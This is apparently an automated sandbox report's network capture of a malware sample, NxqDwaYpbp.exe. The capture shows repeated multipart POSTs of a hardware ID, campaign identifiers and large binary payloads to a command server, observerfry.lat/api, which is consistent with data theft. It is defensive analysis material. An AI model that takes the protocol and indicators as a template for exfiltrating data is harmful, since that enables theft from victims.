                                                                                                      Set-Cookie: PHPSESSID=dg4k2arf3rrk9ij4uplfobo07s; expires=Fri, 18 Apr 2025 10:27:55 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3ErXueCDh0VKaJcpsIDuF4geCJkB%2FllpmxHi3g7s6y1LL7o13i9PeFzCBIHQ7Y2uk3cJY2%2FbHs7kRtP3mWDT%2Bs2H3WW97d5ZGzeOe%2Brt8OM3tbVSjx%2FutdjpoXguqt1Vq8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f69cc528b324361-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1563&rtt_var=604&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13786&delivery_rate=1785932&cwnd=221&unsent_bytes=0&cid=44c841d1298a111a&ts=1915&x=0"
                                                                                                      2024-12-23 16:41:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 16:41:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.1049725104.21.36.2014438044C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 16:41:18 UTC279OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=T70EH3Y0C9S4S49O
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 15062
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-23 16:41:18 UTC15062OUTData Raw: 2d 2d 54 37 30 45 48 33 59 30 43 39 53 34 53 34 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 43 41 38 31 31 42 36 36 32 32 36 38 46 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 37 30 45 48 33 59 30 43 39 53 34 53 34 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 37 30 45 48 33 59 30 43 39 53 34 53 34 39 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 54 37
                                                                                                      Data Ascii: --T70EH3Y0C9S4S49OContent-Disposition: form-data; name="hwid"325CA811B662268FAC8923850305D13E--T70EH3Y0C9S4S49OContent-Disposition: form-data; name="pid"2--T70EH3Y0C9S4S49OContent-Disposition: form-data; name="lid"PsFKDg--pablo--T7
                                                                                                      2024-12-23 16:41:19 UTC1122INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 16:41:19 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=udnb0i8cafg09thn2mvdcgf0cd; expires=Fri, 18 Apr 2025 10:27:58 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FKXsn0ieWqm8RerF7A0rwvGUo61Hd3jevLOzswygq3PlpG%2FkELWUCglYNtM2hO7fPGUwvNzR04GZE5B6lsjiq2riK87t3HoOvFsx2QX3vx3QLwlR8p2tE0gjQA2DNTYn718%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f69cc63ef0f1a44-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2000&rtt_var=758&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15999&delivery_rate=1434889&cwnd=128&unsent_bytes=0&cid=09a25b01d3136c3e&ts=873&x=0"
                                                                                                      2024-12-23 16:41:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 16:41:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.1049731104.21.36.2014438044C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 16:41:20 UTC273OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=MOCIQF2RN6
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20388
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-23 16:41:20 UTC15331OUTData Raw: 2d 2d 4d 4f 43 49 51 46 32 52 4e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 43 41 38 31 31 42 36 36 32 32 36 38 46 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4d 4f 43 49 51 46 32 52 4e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 4f 43 49 51 46 32 52 4e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4d 4f 43 49 51 46 32 52 4e 36 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                      Data Ascii: --MOCIQF2RN6Content-Disposition: form-data; name="hwid"325CA811B662268FAC8923850305D13E--MOCIQF2RN6Content-Disposition: form-data; name="pid"3--MOCIQF2RN6Content-Disposition: form-data; name="lid"PsFKDg--pablo--MOCIQF2RN6Content-
                                                                                                      2024-12-23 16:41:20 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 5c 5f f0 2b b1 64 f0 7c 3c 78
                                                                                                      Data Ascii: lpQ0/74G6(~`~O\_+d|<x
                                                                                                      2024-12-23 16:41:21 UTC1126INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 16:41:21 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=bpdmscmvn2mm8ibi5g89cv408b; expires=Fri, 18 Apr 2025 10:28:00 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hqO%2BjBaGu1ZFzjimkicvVdpht2myUIcZ3xFuXFY%2BTX39RUpBdUhDZswQONxyaq1xaaazcccXPU8mzsDG0zBPS0MpQWDcCanZG8tCkStygD4w7KBBycz07qeRjGxwhqStUTg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f69cc7298b31831-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1657&rtt_var=622&sent=16&recv=29&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21341&delivery_rate=1760096&cwnd=235&unsent_bytes=0&cid=ee3208666cf26dbd&ts=1058&x=0"
                                                                                                      2024-12-23 16:41:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 16:41:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.1049737104.21.36.2014438044C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 16:41:23 UTC271OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=4IUN73V7I
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1184
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-23 16:41:23 UTC1184OUTData Raw: 2d 2d 34 49 55 4e 37 33 56 37 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 43 41 38 31 31 42 36 36 32 32 36 38 46 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 49 55 4e 37 33 56 37 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 49 55 4e 37 33 56 37 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 34 49 55 4e 37 33 56 37 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                      Data Ascii: --4IUN73V7IContent-Disposition: form-data; name="hwid"325CA811B662268FAC8923850305D13E--4IUN73V7IContent-Disposition: form-data; name="pid"1--4IUN73V7IContent-Disposition: form-data; name="lid"PsFKDg--pablo--4IUN73V7IContent-Disp
                                                                                                      2024-12-23 16:41:24 UTC1124INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 16:41:24 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=2rhku6li38olao74pnbpf1078h; expires=Fri, 18 Apr 2025 10:28:03 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NNpS2zsDoHEpOXA8hiAbGRnPhF2bDm%2FKmO9dG8EtnAB4G3yPYDLbFJNw4ZumwYkMprwZNEQI84%2BvPtjqoq%2FZhB3SRiF0uOf6T0l9DF3xetrjsj8bSfEEJHmBnMMkAyhTbQk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f69cc82fd024378-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1674&rtt_var=661&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2091&delivery_rate=1744324&cwnd=235&unsent_bytes=0&cid=ca7e4c004cea991e&ts=823&x=0"
                                                                                                      2024-12-23 16:41:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 16:41:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.1049744104.21.36.2014438044C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 16:41:26 UTC278OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=A7GV7CTC5OUHRY
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 552952
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: 2d 2d 41 37 47 56 37 43 54 43 35 4f 55 48 52 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 43 41 38 31 31 42 36 36 32 32 36 38 46 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 37 47 56 37 43 54 43 35 4f 55 48 52 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 37 47 56 37 43 54 43 35 4f 55 48 52 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 41 37 47 56 37 43 54 43
                                                                                                      Data Ascii: --A7GV7CTC5OUHRYContent-Disposition: form-data; name="hwid"325CA811B662268FAC8923850305D13E--A7GV7CTC5OUHRYContent-Disposition: form-data; name="pid"1--A7GV7CTC5OUHRYContent-Disposition: form-data; name="lid"PsFKDg--pablo--A7GV7CTC
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: 5f 9a 6f 2a 85 12 05 35 e2 bd 8d b9 fc f4 7a 93 34 5c 08 93 a8 83 8b 9d 1e 15 bc c2 0a 67 d6 68 46 81 8f 17 ea 76 18 26 a2 88 e5 20 51 31 f6 7a 2d 77 43 0a fb 61 5e a1 e9 6f e3 67 c7 6b 1c d0 0d 45 67 8e c6 ed f6 5d 1b 35 89 6a 17 f0 36 35 69 46 89 5c 1e 30 cd c0 de 30 b2 55 94 67 7d 77 78 51 27 2e 3a a3 42 9a eb ac 7b 88 17 63 2f be b0 6b 95 58 de 2e 5e 44 cf 46 6f c6 d7 07 fc 25 59 50 57 e7 80 b9 b3 88 a7 00 b7 d4 d5 96 d7 c2 68 70 14 4d 39 84 f7 8e 86 9c cf 83 32 72 1a 04 fb 71 86 e5 87 68 de e3 ef 90 41 28 b2 ae 8b 87 9a 72 6b bc 06 4b ca 7a 03 3e 5e c0 ae a7 05 32 cb 19 28 87 9a 90 aa c0 99 46 6d e6 9b d3 f9 02 bc e0 d2 be 1a 9d 39 fc 62 2a 06 b0 24 d7 65 14 01 c5 aa 14 17 c0 8b cf e9 d5 be d4 be 3a 18 4e 71 c2 2e 28 79 78 a1 e9 1e a5 ba 17 ae 7d 2b
                                                                                                      Data Ascii: _o*5z4\ghFv& Q1z-wCa^ogkEg]5j65iF\00Ug}wxQ'.:B{c/kX.^DFo%YPWhpM92rqhA(rkKz>^2(Fm9b*$e:Nq.(yx}+
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: d6 58 c1 21 94 6d 42 20 70 65 60 2d a3 94 99 9a 15 31 be d1 40 c8 a3 22 3d 43 88 55 26 34 5f e3 b7 13 a9 c3 d8 35 71 5f 3b 8c f4 18 ee bb 22 24 b3 3a ff c7 8b 3a 5e b6 ad ec b7 00 91 67 b0 c4 7d d7 d5 3b 42 99 67 92 24 f2 9a d3 2a f4 64 0b 7b 02 bf 6f a7 14 48 58 0c 29 ab 60 48 2f 0f 69 00 33 34 17 c4 9c 12 dc dd f0 42 19 7f d6 49 fc cf eb 47 35 26 f9 ec 27 c9 79 fb 5f 92 99 e9 54 ae 81 7e 5a 34 f6 e8 00 5e 56 a9 96 c2 35 e3 50 eb b7 a6 e0 42 18 53 88 88 d6 08 cd 1c a9 97 4e 33 3d 66 ab dc 24 9a de 2b 22 6c 76 14 ae fd d1 f1 c6 0e ad 1e 2a 73 a5 02 be 91 d2 dc ec 51 67 90 e7 93 8a 24 09 06 cc 9f c6 5c 21 41 67 da cb a3 ce 91 a3 59 64 01 8b 5c 65 69 24 01 d9 a7 38 5a eb 51 fd 44 23 91 69 e2 c5 f9 a9 ed be f1 66 5c c8 c2 60 2b ec f3 02 8e e3 6e 5c cb 19 11
                                                                                                      Data Ascii: X!mB pe`-1@"=CU&4_5q_;"$::^g};Bg$*d{oHX)`H/i34BIG5&'y_T~Z4^V5PBSN3=f$+"lv*sQg$\!AgYd\ei$8ZQD#if\`+n\
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: 25 c9 d2 92 20 53 7c e2 93 90 53 e3 9b 37 db bb 6a f4 0d f5 eb 82 e7 06 43 7c 18 3d 3d 32 94 93 90 30 26 b2 07 7e db 6f 34 10 f8 73 9c fd ce d3 62 b4 1a cd 4f 2f 2c 9c d1 94 c9 99 23 90 04 3d b9 09 2f 05 4f 8c 47 5f 31 d0 13 7e 3b 41 97 4d 23 25 85 78 2d be 43 ab 9e 34 49 48 8b 0f 98 3b 4b a1 9c 8e 9d af b3 85 63 58 87 c0 59 50 c1 d2 ce 53 ce 72 3d d9 65 be d1 13 2a d8 b7 9d bd 70 39 ea ea ba e4 c1 96 8c 3e 42 17 e6 be 7a 34 2e 5f 43 dd a5 31 bd 2d 2c 9f 6b cd 9c 82 91 10 a8 3c d8 b3 d6 5d eb 14 a9 98 eb 3a b3 e6 c9 7e f8 d0 20 07 45 14 61 74 d1 1a 1a 49 58 f8 f4 e2 1d 2a 17 a3 d1 cd 9e 41 51 5b 5c b5 4d c7 1b 5c 5b 1b 2d fe 25 28 73 98 49 7e 1c 16 63 75 a1 3b b1 82 43 a9 9a 00 9c 2d f9 54 a9 f6 cf 9c 7f 49 49 f1 7a 2e c6 02 7c cb b6 3f 28 dd a8 9c 45 c2
                                                                                                      Data Ascii: % S|S7jC|==20&~o4sbO/,#=/OG_1~;AM#%x-C4IH;KcXYPSr=e*p9>Bz4._C1-,k<]:~ EatIX*AQ[\M\[-%(sI~cu;C-TIIz.|?(E
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: fa 51 ea 7d 31 cb f9 a8 17 e1 0a 74 fd 1a 6d b1 00 25 7a f6 17 a6 81 af b9 a6 69 14 69 1e c2 2d a9 1d 5a 08 6a 30 38 55 63 a4 8d 88 de 62 7e ab ff 35 cc f6 c6 bf 9f 31 1f 08 e6 61 ce ba 51 b4 99 6e 05 38 67 ae 7b 02 a4 ea 34 63 9f cc fa 21 f4 eb da 4b a3 95 e1 81 98 e0 ee 03 12 af 91 0d 47 5b ac 38 7f 53 a8 64 89 fa e9 29 4a 1f f5 c9 22 3b 37 76 43 28 1f 29 b4 d5 aa e5 9c d7 7a b6 42 ca 33 cf 55 25 94 6f 79 9c 0e 4c 3c 4a d6 16 be 2b 40 6f 45 55 27 7c 26 d6 24 e9 9f 5c b7 4e c4 b5 98 74 d7 97 aa 64 54 27 6e 65 7e 23 25 a0 0c 52 3e 60 aa 87 88 65 e0 80 ce a2 2b 2e 2b 62 1d 89 8d 9a a0 fb 67 73 b3 b7 d2 51 3d 51 ce c6 ea d9 9c 0b 66 08 3b 53 bb f5 90 50 4f 6c d1 e2 7e 26 eb aa 69 3a cc d7 de 13 72 90 75 c1 37 0d 4d f3 dc d0 38 85 3f e9 9b 27 6c 90 f6 ff 1d
                                                                                                      Data Ascii: Q}1tm%zii-Zj08Ucb~51aQn8g{4c!KG[8Sd)J";7vC()zB3U%oyL<J+@oEU'|&$\NtdT'ne~#%R>`e+.+bgsQ=Qf;SPOl~&i:ru7M8?'l
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: 3d 00 12 be a3 e1 0f 7b aa 07 4a 50 9f fe 5a 93 ce d3 be 54 39 28 09 2e 26 74 fd a7 f3 81 42 c5 83 43 8b d9 81 bf b1 07 a4 a1 cb 88 a7 bf 7b 43 a0 05 45 36 ac bc 8c 95 c7 04 74 0e 64 ce 9c 4e c8 1f b8 42 4b 37 cd 67 6a a5 06 bf e5 5e 6e 5d ca bc 4d f1 46 bd 97 26 16 0c 12 c7 0a 97 86 88 4a 5e 6a c0 11 76 ae 4e 31 34 08 25 57 7c 22 12 8f 1a e4 d6 ae 21 50 0e 73 20 ad ef cc 69 d0 10 10 41 13 03 c7 a7 5f 3e 98 7f fb e2 6e c7 85 26 d1 2c 67 11 d0 eb 3c 23 55 b4 8f 84 81 7d b8 a8 2e 62 24 0a 75 ad d6 75 40 eb 29 2d 6d 4b bc 66 65 55 62 3e 9d df ef 14 48 36 d4 cb 69 9d c3 25 e0 ea e5 37 3c f8 0d 0c b0 21 5e db 05 57 13 17 84 0e 5d 3e ea d7 5f ad 27 df 75 6e 38 d5 73 fe 1b 89 d0 44 e1 e5 20 88 d4 db 2c 4d 5f 78 c4 20 66 4e 08 8c e8 b7 6d f2 52 9e 69 b3 4a 71 14
                                                                                                      Data Ascii: ={JPZT9(.&tBC{CE6tdNBK7gj^n]MF&J^jvN14%W|"!Ps iA_>n&,g<#U}.b$uu@)-mKfeUb>H6i%7<!^W]>_'un8sD ,M_x fNmRiJq
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: 56 ae ae a7 24 ae dd 3a 3a 35 f1 54 24 58 bd 8e 9e 80 0c 4c aa 3f 0b 93 06 45 1d aa 6f 16 7a ff ee 7c e2 ea ca bc 58 a0 f5 bc c1 6f 78 ae 4a b2 4f e4 6f 04 b1 21 d4 1d b1 83 a5 63 51 59 03 42 12 ea 1f 28 33 38 eb 32 33 d7 dd 59 bd 0e a1 62 1a ad a8 d3 44 02 45 06 c8 6c f8 a6 79 a3 18 55 2d 0c 79 6a e1 2d a2 2f fa a0 1a 4a 61 ad 90 76 b5 47 66 6c 34 b6 59 13 7d a5 72 66 a9 4e 2c fa 90 89 0a 57 68 d1 d2 31 89 d0 2f ee 96 a7 8c 08 da 88 1c f2 d5 f0 3d ae ac fe f3 78 21 c7 50 1c 0f bf 54 5e 5a f5 77 48 07 e8 3a 40 53 00 25 5b ab 3b f7 a7 18 44 5d 47 fd 50 b4 3b e3 ca 32 06 71 b4 8b 42 2d f5 48 ee e3 1e 5a 0f 3c 8b 45 3f d9 74 ec e5 22 25 e1 dc 2d 87 eb 83 72 b8 f0 d6 24 33 4c a6 2f 63 ba f2 92 c0 af 94 50 2b 4c 96 41 f3 a7 c7 b8 53 4a e7 97 72 0f 3b 47 92 07
                                                                                                      Data Ascii: V$::5T$XL?Eoz|XoxJOo!cQYB(3823YbDElyU-yj-/JavGfl4Y}rfN,Wh1/=x!PT^ZwH:@S%[;D]GP;2qB-HZ<E?t"%-r$3L/cP+LASJr;G
                                                                                                      2024-12-23 16:41:26 UTC15331OUTData Raw: d9 2b 54 07 a0 a8 56 4d bd 37 55 bb b1 fa 8a 78 2f 36 63 fe f0 88 78 09 a2 9c ed 52 07 f4 1f 75 fb d8 8e d6 c0 95 3d 1c a0 31 7b 3f 56 fb af e5 51 2c 30 d0 3f ad 81 1c c4 16 a4 41 4d 3a f0 ee 60 42 eb d2 0c 34 8c 4f 9f de 3d c0 f0 de 25 1f 47 3f a7 9d 7d a8 66 7f 9a d7 ed 3d 20 76 a1 7a 7c f1 af c6 7b d7 0e 91 6c d6 92 d0 04 1c 98 46 bc 9c e5 73 ef ef 2c 8d f4 ad 0f e1 dc 99 42 ed 5d 93 07 28 bc a4 c1 46 3a 15 c1 36 d4 0a e4 f1 ef 9f 43 27 37 9d ad ef c4 f3 9a 84 1c 28 41 9a f7 63 26 b9 05 b6 f9 01 87 16 d5 e5 ca 2a 03 bb 11 80 e6 96 d4 39 92 00 ad c6 3e 8d 58 7a c6 4f d2 6b b7 90 0a fe 7c 37 81 60 29 4b e8 3d 6a 22 29 1e 6d 74 cf ea 0d 2d fc 4c 35 08 29 1b 9d 6e d2 fb 7b be 3a 22 b2 0e 41 b7 9e c1 5d e5 b6 b3 0f b6 f1 da ee d7 30 8d e8 3e ec 36 4c 46 05
                                                                                                      Data Ascii: +TVM7Ux/6cxRu=1{?VQ,0?AM:`B4O=%G?}f= vz|{lFs,B](F:6C'7(Ac&*9>XzOk|7`)K=j")mt-L5)n{:"A]0>6LF
